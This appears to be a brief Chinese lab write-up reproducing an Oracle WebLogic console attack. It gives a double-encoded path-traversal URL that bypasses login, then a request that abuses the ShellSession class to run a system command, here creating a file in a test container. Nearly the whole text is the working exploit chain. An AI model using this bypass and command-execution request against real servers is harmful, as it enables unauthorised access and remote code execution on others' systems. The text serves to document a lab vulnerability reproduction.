ip:/console进入登录页面
然后我们输入
ip:7001/console/css/%252e%252e%252fconsole.portal进行登陆绕过
然后我们进行访问
http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/txt');")
利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令
我们看到页面回显404,进入环境漏洞容器中查看文件是否被建立
可以看到文件已经被成功建立
版权声明:本文为qq_52471916原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。